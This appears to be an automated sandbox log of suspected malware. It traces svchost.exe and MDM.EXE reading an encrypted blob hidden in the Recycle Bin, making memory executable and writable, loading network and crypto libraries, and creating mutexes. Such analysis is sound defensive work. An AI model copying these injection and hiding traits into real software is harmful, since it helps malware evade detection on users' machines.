Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321265168
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BAFF660 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321265471
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2321266396
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2321267391
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 3D94D508 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2321278759
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321295712
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321299566
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321304070
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321308387
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321312877
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321316721
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321321177
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321325099
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321329605
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321333477
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321338275
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321342536
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321347087
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321350929
File opened Path: C:\WINDOWS\system32\WS2_32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321355552
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and read Type: commit Baseaddress: 930000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 2321359647
File opened Path: C:\WINDOWS\system32\ADVAPI32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321363292
Section loaded Path: C:\WINDOWS\system32\advapi32.dll Access: query and read Type: commit Baseaddress: 930000 Size: 28672 Protection: readonly Mapped to pid: own pid success or wait 2321367435
File opened Path: C:\WINDOWS\system32\CRYPT32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321371908
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and read Type: commit Baseaddress: 930000 Size: 77824 Protection: readonly Mapped to pid: own pid success or wait 2321376142
Mutant created Name: \BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 2321379691
Thread created PID: 2224 TID: 3364 EIP: 7C8106F9 Imagepath: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Injected: false success or wait 2321381259
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2321390862
Thread delayed Time: 0 TID: 12904 success or wait 2322230674
Thread delayed Time: 0 TID: 12904 success or wait 2322286790
Thread delayed Time: 0 TID: 12904 success or wait 2322287289
Thread delayed Time: 0 TID: 12904 success or wait 2323349279
Thread delayed Time: 0 TID: 12904 success or wait 2323405417
Thread delayed Time: 0 TID: 12904 success or wait 2323405902
Thread delayed Time: 0 TID: 12904 success or wait 2324467520
Thread delayed Time: 0 TID: 12904 success or wait 2324523779
Thread delayed Time: 0 TID: 12904 success or wait 2324524278
Thread delayed Time: 0 TID: 12904 success or wait 2325586143
Thread delayed Time: 0 TID: 12904 success or wait 2325642289
Thread delayed Time: 0 TID: 12904 success or wait 2325642789
Thread delayed Time: 0 TID: 12904 success or wait 2326962012
Thread delayed Time: 0 TID: 12904 success or wait 2326962423
Thread delayed Time: 0 TID: 12904 success or wait 2326962830
Thread delayed Time: 0 TID: 12904 success or wait 2328049017
Thread delayed Time: 0 TID: 12904 success or wait 2328049194
Thread delayed Time: 0 TID: 12904 success or wait 2328049365
Thread delayed Time: 0 TID: 12904 success or wait 2329166319
Thread delayed Time: 0 TID: 12904 success or wait 2329166498
Thread delayed Time: 0 TID: 12904 success or wait 2329166668
Thread delayed Time: 0 TID: 12904 success or wait 2330286411
Thread delayed Time: 0 TID: 12904 success or wait 2330286928
Thread delayed Time: 0 TID: 12904 success or wait 2330287533
Thread delayed Time: 0 TID: 12904 success or wait 2331404971
Thread delayed Time: 0 TID: 12904 success or wait 2331405478
Thread delayed Time: 0 TID: 12904 success or wait 2331405975
Thread delayed Time: 0 TID: 12904 success or wait 2332523710
Thread delayed Time: 0 TID: 12904 success or wait 2332524247
Thread delayed Time: 0 TID: 12904 success or wait 2332524753
Thread delayed Time: 0 TID: 12904 success or wait 2333642280
Thread delayed Time: 0 TID: 12904 success or wait 2333642803
Thread delayed Time: 0 TID: 12904 success or wait 2333643311
Thread delayed Time: 0 TID: 12904 success or wait 2334760756
Thread delayed Time: 0 TID: 12904 success or wait 2334761264
Thread delayed Time: 0 TID: 12904 success or wait 2334761765
Thread delayed Time: 0 TID: 12904 success or wait 2335879395
Thread delayed Time: 0 TID: 12904 success or wait 2335879903
Thread delayed Time: 0 TID: 12904 success or wait 2335880402
Thread delayed Time: 0 TID: 12904 success or wait 2336997748
Thread delayed Time: 0 TID: 12904 success or wait 2336998269
Thread delayed Time: 0 TID: 12904 success or wait 2336998777
Thread delayed Time: 0 TID: 12904 success or wait 2338116270
Thread delayed Time: 0 TID: 12904 success or wait 2338116772
Thread delayed Time: 0 TID: 12904 success or wait 2338117264
Thread delayed Time: 0 TID: 12904 success or wait 2339238004
Thread delayed Time: 0 TID: 12904 success or wait 2339238600
+ Sections
+ General
Start time: 05:48:15
Start date: 01/12/2011
Path: C:\WINDOWS\system32\svchost.exe
Commandline: C:\WINDOWS\system32\svchost.exe -k imgsvc
Imagebase: 0x1000000
File size: 14336 bytes
MD5 hash: 27C6D03BCDB8CFEB96B716F3D8BE3E18
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 5 BAD6A36
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 BAF4E4E
C:\WINDOWS\system32\USER32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\WININET.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 11 BAD6A36
C:\WINDOWS\system32\WS2_32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\ADVAPI32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\CRYPT32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
\pipe\globpluginspipe read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 BADD812
+ File read
File Path Offset Length Value Completion Count Source Address
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2 BAE818F
Section Activities:
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\WS2_32.dll write and read and execute unknown 930000 77824 own pid readonly object name not found 1 BAE50FD
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 BAE50FD
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 BAE50FD
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 BAE50FD
\KnownDlls\Normaliz.dll write and read and execute unknown 9B0000 36864 own pid read write conflicting addresses 1 BAE50FD
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 BAE50FD
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSIMG32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\ntdll.dll query and read commit DA0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
\KnownDlls\nspr4.dll write and read and execute unknown E20000 65536 own pid readonly object name not found 1 BAF1523
C:\WINDOWS\system32\user32.dll query and read commit E20000 57344 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E20000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and read commit E20000 20480 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\advapi32.dll query and read commit E20000 28672 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\crypt32.dll query and read commit E20000 77824 own pid readonly success or wait 1 BAD6A8A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 1 9A06B4
\BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 1 BAE0EF7
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
3348 2264 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 9A0639
3344 2264 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
3380 2264 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
3352 2264 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
3372 2264 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
+ Thread delayed
TID Delay Completion Count Source Address
13124 0s success or wait 195 BAED21A
+ Thread terminated
TID PID Completion Count Source Address
3348 2264 success or wait 0 9A0279
+ Chronological sections
Operation Data Completion Time
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2323688534
Thread created PID: 2264 TID: 3348 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2323691779
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 930000 Size: 77824 Protection: readonly Mapped to pid: own pid object name not found 2323695634
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2323697108
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 2323719156
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2323720707
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2323726900
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 9B0000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2323733218
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2323741214
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2323750522
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 2323873418
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2323874939
Thread created PID: 2264 TID: 3344 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2323879989
Thread delayed Time: 0 TID: 13124 success or wait 2323881643
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2323883746
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: DA0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2323888313
Thread created PID: 2264 TID: 3380 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2323892775
Thread created PID: 2264 TID: 3352 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2323895648
Thread delayed Time: 0 TID: 13124 success or wait 2323898856
Thread delayed Time: 0 TID: 13124 success or wait 2323899253
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2323900565
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2323904689
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2323910005
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2323914019
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2323918376
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2323922646
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2323927013
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2323931029
Section loaded Path: \KnownDlls\nspr4.dll Access: write and read and execute Type: unknown Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2323935754
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2323938064
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2323939523
File opened Path: C:\WINDOWS\system32\USER32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2323953054
Section loaded Path: C:\WINDOWS\system32\user32.dll Access: query and read Type: commit Baseaddress: E20000 Size: 57344 Protection: readonly Mapped to pid: own pid success or wait 2323957930
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2323962284
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2323966817
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2323971525
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2323976587
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2323981276
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2323985380
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2323990873
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2323995107
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2323999309
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2324000306
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2324012572
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2324016692
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2324033588
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2324037698
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2324042424
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2324046645
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2324052370
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2324056437
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2324061232
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2324065623
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2324070286
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2324074537
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2324079649
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E20000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2324083736
File opened Path: C:\WINDOWS\system32\WS2_32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2324089553
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and read Type: commit Baseaddress: E20000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 2324093838
File opened Path: C:\WINDOWS\system32\ADVAPI32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2324098354
Section loaded Path: C:\WINDOWS\system32\advapi32.dll Access: query and read Type: commit Baseaddress: E20000 Size: 28672 Protection: readonly Mapped to pid: own pid success or wait 2324102665
File opened Path: C:\WINDOWS\system32\CRYPT32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2324107405
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and read Type: commit Baseaddress: E20000 Size: 77824 Protection: readonly Mapped to pid: own pid success or wait 2324111863
Mutant created Name: \BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 2324115300
Thread created PID: 2264 TID: 3372 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2324117211
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2324119162
Thread delayed Time: 0 TID: 13124 success or wait 2324970975
Thread delayed Time: 0 TID: 13124 success or wait 2324971764
Thread delayed Time: 0 TID: 13124 success or wait 2324972268
Thread delayed Time: 0 TID: 13124 success or wait 2326092745
Thread delayed Time: 0 TID: 13124 success or wait 2326095166
Thread delayed Time: 0 TID: 13124 success or wait 2326096809
Thread delayed Time: 0 TID: 13124 success or wait 2327208480
Thread delayed Time: 0 TID: 13124 success or wait 2327208999
Thread delayed Time: 0 TID: 13124 success or wait 2327209490
Thread delayed Time: 0 TID: 13124 success or wait 2328326850
Thread delayed Time: 0 TID: 13124 success or wait 2328327028
Thread delayed Time: 0 TID: 13124 success or wait 2328327201
Thread delayed Time: 0 TID: 13124 success or wait 2329445372
Thread delayed Time: 0 TID: 13124 success or wait 2329445550
Thread delayed Time: 0 TID: 13124 success or wait 2329445724
Thread delayed Time: 0 TID: 13124 success or wait 2330564313
Thread delayed Time: 0 TID: 13124 success or wait 2330564826
Thread delayed Time: 0 TID: 13124 success or wait 2330565319
Thread delayed Time: 0 TID: 13124 success or wait 2331683008
Thread delayed Time: 0 TID: 13124 success or wait 2331683528
Thread delayed Time: 0 TID: 13124 success or wait 2331684029
Thread delayed Time: 0 TID: 13124 success or wait 2332801536
Thread delayed Time: 0 TID: 13124 success or wait 2332802090
Thread delayed Time: 0 TID: 13124 success or wait 2332802598
Thread delayed Time: 0 TID: 13124 success or wait 2333920127
Thread delayed Time: 0 TID: 13124 success or wait 2333920652
Thread delayed Time: 0 TID: 13124 success or wait 2333921165
Thread delayed Time: 0 TID: 13124 success or wait 2335041436
Thread delayed Time: 0 TID: 13124 success or wait 2335041950
Thread delayed Time: 0 TID: 13124 success or wait 2335042452
Thread delayed Time: 0 TID: 13124 success or wait 2336157353
Thread delayed Time: 0 TID: 13124 success or wait 2336157870
Thread delayed Time: 0 TID: 13124 success or wait 2336158406
Thread delayed Time: 0 TID: 13124 success or wait 2337275599
Thread delayed Time: 0 TID: 13124 success or wait 2337276113
Thread delayed Time: 0 TID: 13124 success or wait 2337276608
Thread delayed Time: 0 TID: 13124 success or wait 2338397600
Thread delayed Time: 0 TID: 13124 success or wait 2338398106
Thread delayed Time: 0 TID: 13124 success or wait 2338398605
Thread delayed Time: 0 TID: 13124 success or wait 2339513250
Thread delayed Time: 0 TID: 13124 success or wait 2339513794
Thread delayed Time: 0 TID: 13124 success or wait 2339514294
Thread delayed Time: 0 TID: 13124 success or wait 2340631525
Thread delayed Time: 0 TID: 13124 success or wait 2340631710
Thread delayed Time: 0 TID: 13124 success or wait 2340631885
Thread delayed Time: 0 TID: 13124 success or wait 2341750146
Thread delayed Time: 0 TID: 13124 success or wait 2341750329